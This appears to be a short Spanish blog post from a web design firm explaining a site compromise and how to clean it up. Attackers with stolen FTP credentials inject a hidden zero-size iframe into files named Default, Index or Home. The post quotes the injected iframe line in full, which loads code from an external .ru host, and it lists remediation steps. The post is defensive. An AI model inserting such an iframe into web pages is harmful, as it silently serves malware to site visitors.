Blog SolucionesUNO.com | Diseño Web, Gráfico, y Posicionamiento Web.

Nos hemos encontrado con un problema con algunos sitios webs, los cuales han sido atacados, y se ha modificado su codigo fuente, añadiendo lineas las cuales Google concidera como MalWare.

Los archivos que fueron infectados (modificados) en general del sitio web son todos los denominados:

Defaults.*
Index.*
Home.*

La linea de codigo que nos añade a nuestros archivos por lo general es:

iframe frameborder=”0″ onload=”if (!this.src){ this.src=’http://smert-test.ru:8080/index.php’; this.height=’0′; this.width=’0′;}” qgbugjfzjmsuhhvwoycloflqbtukhxq iframe

Indiferente de la extension del archivo el Malware ataca a los archivos con este nombre. Inclusive si el archivo se denomina index_old.php. La misma es añadida justo alado de la etiqueta Body, o al final del codigo fuente, un iframe con el codigo mencionado.

Este ataque es por que un sistema atacante se ha apropiado de nuestras contraseñas FTP, infectando alguno ordenador, y entonces genera un script que teniendo dicho acceso, modificara constantemente nuestros archivos. Por más que eliminemos esta linea, debemos cambiar con urgencia el acceso FTP al sitio web, si no siempre nos seguiran modificando el codigo.

¿Como solucionarlo?

1) Modifica todas tus contraseñas FTP´s de todos tus sitios webs.
2) Actualiza tu Cliente FTP a la ultima version.
3) Haz un escaneo completo de virus con tu antivirus actualizado.
4) Pasa alguna herramienta de eliminacion de SpyWares como Spyboot en tu ordenador.
5) Elimina todas las lineas de codigos de tus sitios webs “infectados”. La mejor forma es si el mismo lo tienes en local, utilizar Dreamweaver para buscar y remplazar. Otra opcion seria recuperar backups.
6) Desde Web Master tools, debes tener configurado el sitio web, para solicitar a Google que realize una revision de tu sitio web, con el problema solucionado.
Esto suele tardar aproximadamente unas 10 horas, con lo que deberas tener mucha paciencia.